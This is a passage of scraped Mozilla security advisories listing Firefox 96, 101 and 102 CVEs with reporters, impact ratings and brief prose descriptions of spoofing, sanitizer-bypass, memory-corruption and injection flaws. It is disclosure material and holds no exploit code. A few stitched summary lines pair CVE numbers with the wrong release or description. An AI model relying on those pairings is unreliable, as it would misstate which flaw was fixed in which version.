Reporter

Gareth Heyes

Impact

low

**Description**

SVG <use> tags that referenced a same-origin document could have resulted in script execution if attacker input was sanitized via the HTML Sanitizer API. This would have required the attacker to reference a same-origin JavaScript file containing the script to be executed.

**References**

*   Bug 1757210

**#CVE-2022-34473: HTML Sanitizer could have been bypassed via use tags**

Reporter

Armin Ebert

Impact

low

**Description**

The HTML Sanitizer should have sanitized the href attribute of SVG <use> tags; however it incorrectly did not sanitize xlink:href attributes.

**References**

*   Bug 1770888

**#CVE-2022-34484: Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11**

Reporter

Mozilla developers and community

Impact

high

**Description**

The Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101 and Firefox ESR 91.10. Some of these bugs showed evidence of JavaScript prototype or memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11

**#CVE-2022-34485: Memory safety bugs fixed in Firefox 102**

Reporter

Mozilla developers and community

Impact

moderate

**Description**

Mozilla developers Bryce Seager van Dyk and the Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102

CVE-2022-34468: Security Vulnerabilities fixed in Firefox 102

When scanning QR codes, Firefox for Android would have allowed navigation to some URLs that do not point to web content.<br>*This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 96.

**Mozilla Foundation Security Advisory 2022-01**

Announced

January 11, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 96

**#CVE-2022-22746: Calling into reportValidity could have lead to fullscreen window spoof**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A race condition could have allowed bypassing the fullscreen notification which could have lead to a fullscreen window spoof being unnoticed.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1735071

**#CVE-2022-22743: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When navigating from inside an iframe while requesting fullscreen access, an attacker-controlled tab could have made the browser unable to leave fullscreen mode.

**References**

*   Bug 1739220

**#CVE-2022-22742: Out-of-bounds memory access when inserting text in edit mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When inserting text while in edit mode, some characters might have lead to out-of-bounds memory access causing a potentially exploitable crash.

**References**

*   Bug 1739923

**#CVE-2022-22741: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup while requesting fullscreen access, the popup would have become unable to leave fullscreen mode.

**References**

*   Bug 1740389

**#CVE-2022-22740: Use-after-free of ChannelEventQueue::mOwner**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

Certain network request objects were freed too early when releasing a network request handle. This could have lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1742334

**#CVE-2022-22738: Heap-buffer-overflow in blendGaussianBlur**

Reporter

Atte Kettunen

Impact

high

**Description**

Applying a CSS filter effect could have accessed out of bounds memory. This could have lead to a heap-buffer-overflow causing a potentially exploitable crash.

**References**

*   Bug 1742382

**#CVE-2022-22737: Race condition when playing audio files**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

Constructing audio sinks could have lead to a race condition when playing audio files and closing windows. This could have lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1745874

**#CVE-2021-4140: Iframe sandbox bypass with XSLT**

Reporter

Peter Van der Beken

Impact

high

**Description**

It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox.

**References**

*   Bug 1746720

**#CVE-2022-22750: IPC passing of resource handles could have lead to sandbox bypass**

Reporter

Jed Davis

Impact

moderate

**Description**

By generally accepting and passing resource handles across processes, a compromised content process might have confused higher privileged processes to interact with handles that the unprivileged process should not have access to.  
_This bug only affects Firefox for Windows and MacOS. Other operating systems are unaffected._

**References**

*   Bug 1566608

**#CVE-2022-22749: Lack of URL restrictions when scanning QR codes**

Reporter

Wladimir Palant working with Include Security

Impact

moderate

**Description**

When scanning QR codes, Firefox for Android would have allowed navigation to some URLs that do not point to web content.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1705094

**#CVE-2022-22748: Spoofed origin on external protocol launch dialog**

Reporter

Alesandro Ortiz

Impact

moderate

**Description**

Malicious websites could have confused Firefox into showing the wrong origin when asking to launch a program and handling an external URL protocol.

**References**

*   Bug 1705211

**#CVE-2022-22745: Leaking cross-origin URLs through securitypolicyviolation event**

Reporter

Jannis Rautenstrauch

Impact

moderate

**Description**

Securitypolicyviolation events could have leaked cross-origin information for frame-ancestors violations

**References**

*   Bug 1735856

**#CVE-2022-22744: The 'Copy as curl' feature in DevTools did not fully escape website-controlled data, potentially leading to command injection**

Reporter

Mattias Jacobsson

Impact

moderate

**Description**

The constructed curl command from the "Copy as curl" feature in DevTools was not properly escaped for PowerShell. This could have lead to command injection if pasted into a Powershell prompt.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1737252

**#CVE-2022-22763: Script Execution during invalid object state**

Reporter

Mozilla Fuzzing Team

Impact

moderate

**Description**

When a worker is shutdown, it was possible to cause script to run late in the lifecycle, at a point after where it should not be possible.

**References**

*   Bug 1740534

**#CVE-2022-22747: Crash when handling empty pkcs7 sequence**

Reporter

Tavis Ormandy

Impact

low

**Description**

After accepting an untrusted certificate, handling an empty pkcs7 sequence as part of the certificate data could have lead to a crash. This crash is believed to be unexploitable.

**References**

*   Bug 1735028

**#CVE-2022-22736: Potential local privilege escalation when loading modules from the install directory.**

Reporter

Toshihito Kikuchi

Impact

low

**Description**

If Firefox was installed to a world-writable directory, a local privilege escalation could occur when Firefox searched the current directory for system libraries. However the install directory is not world-writable by default.  
_This bug only affects Firefox for Windows in a non-default installation. Other operating systems are unaffected._

**References**

*   Bug 1742692

**#CVE-2022-22739: Missing throttling on external protocol launch dialog**

Reporter

Alesandro Ortiz

Impact

low

**Description**

Malicious websites could have tricked users into accepting launching a program to handle an external URL protocol.

**References**

*   Bug 1744158

**#CVE-2022-22751: Memory safety bugs fixed in Firefox 96 and Firefox ESR 91.5**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Calixte Denizet, Kershaw Chang, Christian Holler, Jason Kratzer, Gabriele Svelto, Tyson Smith, Simon Giesecke, and Steve Fink reported memory safety bugs present in Firefox 95 and Firefox ESR 91.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 96 and Firefox ESR 91.5

**#CVE-2022-22752: Memory safety bugs fixed in Firefox 96**

Reporter

Mozilla developers and community

Impact

moderate

**Description**

Mozilla developers Christian Holler and Jason Kratzer reported memory safety bugs present in Firefox 95. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 96

CVE-2022-22749: Security Vulnerabilities fixed in Firefox 96

A malicious website could have learned the size of a cross-origin resource that supported Range requests. This vulnerability affects Thunderbird < 91.10, Firefox < 101, and Firefox ESR < 91.10.

**Mozilla Foundation Security Advisory 2022-20**

Announced

May 31, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 101

**#CVE-2022-31736: Cross-Origin resource's length leaked**

Reporter

Luan Herrera

Impact

high

**Description**

A malicious website could have learned the size of a cross-origin resource that supported Range requests.

**References**

*   Bug 1735923

**#CVE-2022-31737: Heap buffer overflow in WebGL**

Reporter

Atte Kettunen

Impact

high

**Description**

A malicious webpage could have caused an out-of-bounds write in WebGL, leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1743767

**#CVE-2022-31738: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When exiting fullscreen mode, an iframe could have confused the browser about the current state of fullscreen, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1756388

**#CVE-2022-31739: Attacker-influenced path traversal when saving downloaded files**

Reporter

Chaobin Zhang

Impact

high

**Description**

When downloading files on Windows, the % character was not escaped, which could have lead to a download incorrectly being saved to attacker-influenced paths that used variables such as %HOMEPATH% or %APPDATA%.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1765049

**#CVE-2022-31740: Register allocation problem in WASM on arm64**

Reporter

Gary Kwong

Impact

high

**Description**

On arm64, WASM code could have resulted in incorrect assembly generation leading to a register allocation problem, and a potentially exploitable crash.

**References**

*   Bug 1766806

**#CVE-2022-31741: Uninitialized variable leads to invalid memory read**

Reporter

Cybeats PSI Team

Impact

high

**Description**

A crafted CMS message could have been processed incorrectly, leading to an invalid memory read, and potentially further memory corruption.

**References**

*   Bug 1767590

**#CVE-2022-31742: Querying a WebAuthn token with a large number of allowCredential entries may have leaked cross-origin information**

Reporter

Michal

Impact

moderate

**Description**

An attacker could have exploited a timing attack by sending a large number of allowCredential entries and detecting the difference between invalid key handles and cross-origin key handles. This could have led to cross-origin account linking in violation of WebAuthn goals.

**References**

*   Bug 1730434

**#CVE-2022-31743: HTML Parsing incorrectly ended HTML comments prematurely**

Reporter

Linus Särud

Impact

moderate

**Description**

Firefox's HTML parser did not correctly interpret HTML comment tags, resulting in an incongruity with other browsers. This could have been used to escape HTML comments on pages that put user-controlled data in them.

**References**

*   Bug 1747388

**#CVE-2022-31744: CSP bypass enabling stylesheet injection**

Reporter

Gertjan

Impact

moderate

**Description**

An attacker could have injected CSS into stylesheets accessible via internal URIs, such as resource:, and in doing so bypass a page's Content Security Policy.

**References**

*   Bug 1757604

**#CVE-2022-31745: Incorrect Assertion caused by unoptimized array shift operations**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

If array shift operations are not used, the Garbage Collector may have become confused about valid objects.

**References**

*   Bug 1760944

**#CVE-2022-1919: Memory Corruption when manipulating webp images**

Reporter

Irvan Kurniawan

Impact

low

**Description**

An attacker could have caused an uninitialized variable on the stack to be mistakenly freed, causing a potentially exploitable crash.

**References**

*   Bug 1761275

**#CVE-2022-31747: Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Andrew McCreight, Nicolas B. Pierron, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 100 and Firefox ESR 91.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 101 and Firefox ESR 91.10

**#CVE-2022-31748: Memory safety bugs fixed in Firefox 101**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Gabriele Svelto, Timothy Nikkel, Randell Jesup, Jon Coppeard, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 100. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 101

Tag

#firefox